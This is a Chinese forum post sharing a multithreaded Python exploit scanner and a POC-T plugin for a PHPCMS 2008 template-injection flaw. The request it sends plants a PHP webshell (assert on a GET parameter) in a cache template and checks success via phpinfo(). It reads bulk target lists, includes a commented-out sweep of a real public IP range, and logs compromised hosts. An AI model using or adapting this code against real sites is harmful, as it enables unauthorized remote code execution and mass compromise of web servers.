本帖最后由 leishao123 于 2018-12-9 23:35 编辑
测试环境windows10+Python3.7
本地搭建测试没问题
原本这脚本在漏洞出的那天就写好提交了,管理员到现在才回复,因为忙吧。。import queue
import threading
import requests
import sys
def payload(url):
payload_url = """/type.php?template=tag_(){};@unlink(FILE);assert($_GET[1]);{//../rss"""
validation = """/data/cache_template/rss.tpl.php?1=phpinfo()"""
try:
requests_strus = requests.get(url+payload_url,timeout = 5).status_code
if requests_strus == 200:
requests_validation = requests.get(url+validation).text
if '<title>phpinfo()</title>'in requests_validation:
print(url+validation)
open('sccess.txt','a').write(url+'\n')
except:
print('[-]'+url)
pass
def q_put():
# for i in range(1,255):
# for i_2 in range(1, 255):
# s = '61.134.'+str(i)+'.'+str(i_2)
# q.put(s)
file = open(str(sys.argv[1]), 'r')
for i in file:
s = i.strip()
q.put(s)
def q_get():
while not q.empty():
ip = q.get()
requests_json(ip)
def main():
q_put()
for i in range(30):
threads.append(threading.Thread(target=q_get))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
q = queue.Queue()
main()
#payload('http://127.0.0.1:8080/phpcms2008sp4_utf8_111122/')
另外还有一个POC-T的插件#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
def poc(url):
url = url if '://' in url else 'http://' + url
payload_url = """/type.php?template=tag_(){};@unlink(FILE);assert($_GET[1]);{//../rss"""
validation = """/data/cache_template/rss.tpl.php?1=phpinfo()"""
try:
requests_strus = requests.get(url+payload_url,timeout = 5).status_code
if requests_strus == 200:
requests_validation = requests.get(url+validation).text
if '<title>phpinfo()</title>'in requests_validation:
return url
except Exception:
return False
return False
#print(poc('http://127.0.0.1:8080/phpcms2008sp4_utf8_111122/'))
|
楼主